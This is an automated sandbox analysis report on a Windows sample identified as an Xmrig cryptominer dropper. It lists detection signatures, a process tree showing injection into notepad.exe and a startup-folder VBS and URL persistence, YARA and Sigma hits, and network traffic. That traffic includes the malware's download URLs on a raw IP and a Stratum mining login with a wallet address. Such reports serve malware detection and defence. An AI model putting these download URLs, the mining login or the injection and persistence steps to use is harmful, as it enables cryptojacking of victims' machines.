Windows Analysis Report 4rC1bQcnl5

Overview

General Information

Sample Name: 4rC1bQcnl5 (renamed file extension from none to exe)
Analysis ID: 453466
MD5: d572da9202196121d952231f26d65d07
SHA1: 8934580e7ee3f3852e159298769bdd38bcaa12a0
SHA256: 15337a846c1e262136124361b3624ddd3519cf3c7f93aba1ed75728a482fc662
Tags: 32exe
Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 4rC1bQcnl5.exe (PID: 4924 cmdline: 'C:\Users\user\Desktop\4rC1bQcnl5.exe' MD5: D572DA9202196121D952231F26D65D07)
    • 4rC1bQcnl5.exe (PID: 4644 cmdline: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe MD5: D572DA9202196121D952231F26D65D07)
    • 4rC1bQcnl5.exe (PID: 5932 cmdline: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe MD5: D572DA9202196121D952231F26D65D07)
      • oQOWFbKllEKo.exe (PID: 3440 cmdline: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe MD5: 77276DDC82248473D033E2494C438A97)
      • notepad.exe (PID: 5064 cmdline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg' MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
      • cmd.exe (PID: 2952 cmdline: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 5056 cmdline: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • svchost.exe (PID: 1864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5804 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5212 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5760 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1544 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5920 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 476 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1260 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 988 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) |
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(8 entries in the original report)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.0.oQOWFbKllEKo.exe.1460000.1.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
16.2.4rC1bQcnl5.exe.400000.1.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
17.2.oQOWFbKllEKo.exe.1460000.1.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
17.0.oQOWFbKllEKo.exe.1460000.5.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
16.2.4rC1bQcnl5.exe.400000.1.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(4 entries in the original report)

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community | Data: Command: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine|base64offset|contains: Y'+, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2952, ProcessCommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ProcessId: 5056

Data Obfuscation:

Sigma detected: Drops script at startup location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 5056, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Jbx Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://45.144.225.135/notepad.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\LKBNMTFJgl\csrss | ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: 4rC1bQcnl5.exe | Virustotal: Detection: 17%
Source: 4rC1bQcnl5.exe | ReversingLabs: Detection: 23%
Source: 17.0.oQOWFbKllEKo.exe.1460000.3.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 16.2.4rC1bQcnl5.exe.37c0000.4.unpack | Avira: Label: TR/Dropper.Gen
Source: 17.0.oQOWFbKllEKo.exe.1460000.5.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 17.0.oQOWFbKllEKo.exe.1460000.1.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 16.2.4rC1bQcnl5.exe.400000.1.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 17.2.oQOWFbKllEKo.exe.1460000.1.unpack | Avira: Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00408B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,FindCloseChangeNotification | 16_2_00408B20
Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe | Code function: 17_2_01468B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle | 17_2_01468B20

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 17.0.oQOWFbKllEKo.exe.1460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.4rC1bQcnl5.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.oQOWFbKllEKo.exe.1460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.oQOWFbKllEKo.exe.1460000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.4rC1bQcnl5.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.oQOWFbKllEKo.exe.1460000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.4rC1bQcnl5.exe.37c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.329749766.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.504581184.00000000037C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4rC1bQcnl5.exe PID: 5932, type: MEMORY
Source: Yara match | File source: Process Memory Space: oQOWFbKllEKo.exe PID: 3440, type: MEMORY
DNS related to crypt mining pools
Source: unknown | DNS query: name: xmr-us-east1.nanopool.org
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.2.5:49718 -> 192.99.69.170:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}
Source: global traffic | TCP traffic: 192.168.2.5:49728 -> 192.99.69.170:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}
Found strings related to Crypto-Mining
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: stratum+ssl://
Source: notepad.exe, 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp | String found in binary or memory: CryptonightR_instruction0
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: stratum+tcp://
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: XMRig 5.11.1
Source: 4rC1bQcnl5.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 4rC1bQcnl5.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Joe Sandbox View | IP Address: 45.144.225.135
Source: Joe Sandbox View | ASN Name: OVHFR
Source: unknown | TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00404B00 GetTickCount,GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,GetTickCount,HttpOpenRequestA,GetTickCount,GetTickCount,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 16_2_00404B00
Source: global traffic | HTTP traffic detected:
  GET /config.txt HTTP/1.1
  Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile
  User-Agent: WinInetGet/0.1
  Host: 45.144.225.135
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: xmr-us-east1.nanopool.org
Source: 4rC1bQcnl5.exe, oQOWFbKllEKo.exe | String found in binary or memory: http://45.144.225.135/config.txt
Source: 4rC1bQcnl5.exe | String found in binary or memory: http://45.144.225.135/notepad.exe
Source: svchost.exe, 00000005.00000002.497319180.0000015D39A16000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000005.00000002.497319180.0000015D39A16000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000005.00000002.497265959.0000015D39A00000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: svchost.exe, 00000005.00000002.498728475.0000015D39DF0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enume
Source: svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comion
Source: 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: 4rC1bQcnl5.exe, 00000000.00000002.326329600.0000000003287000.00000004.00000001.sdmp | String found in binary or memory: https://RtlGetVersionntdll.dll
Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 4rC1bQcnl5.exe | String found in binary or memory: https://iconscout.com/legal#licenses
Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.306593475.000002B69C445000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: https://xmrig.com/wizard
Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | String found in binary or memory: https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity
Source: 4rC1bQcnl5.exe, 00000000.00000002.325615282.0000000001460000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
Source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\notepad.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00402E40 GetLastError,NtOpenSection,NtMapViewOfSection,NtClose | 16_2_00402E40
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00408A50 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose | 16_2_00408A50
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004068E0 RtlDosPathNameToNtPathName_U,NtCreateFile | 16_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00407AF0 GetFileAttributesW,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose | 16_2_00407AF0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00403680 NtCreateFile | 16_2_00403680
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose | 16_2_00403CA0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00406340 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree | 16_2_00406340
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00403B50 NtClose | 16_2_00403B50
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00403720 NtCreateFile,NtCreateFile | 16_2_00403720
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00403BC0 NtCreateFile,NtWriteFile,NtClose,NtClose | 16_2_00403BC0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004037E0 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose | 16_2_004037E0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004029E0 DeleteFileW,RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,Sleep,Sleep,NtWaitForSingleObject,TerminateThread,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose | 16_2_004029E0
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00406990 RtlDosPathNameToNtPathName_U,NtCreateFile | 16_2_00406990
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004085B0 RtlInitUnicodeString,NtOpenKey,GetLastError,RtlInitUnicodeString,GetLastError,NtQueryValueKey,NtClose,NtClose | 16_2_004085B0
